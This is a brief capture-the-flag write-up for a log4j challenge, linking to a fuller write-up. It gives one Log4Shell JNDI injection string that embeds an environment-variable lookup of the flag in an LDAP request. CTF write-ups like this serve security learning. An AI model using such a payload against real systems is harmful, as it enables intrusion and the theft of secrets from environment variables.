We should use log4j CVE to exploit jndi and get flag from environment variable with following command:

${jndi:ldap://127.0.0.1/${env:FLAG}}

link to complete writeup

Original writeup (https://github.com/Execut3/CTF-WriteUps/tree/master/2021/hxp/misc/Log%204%20sanity%20check).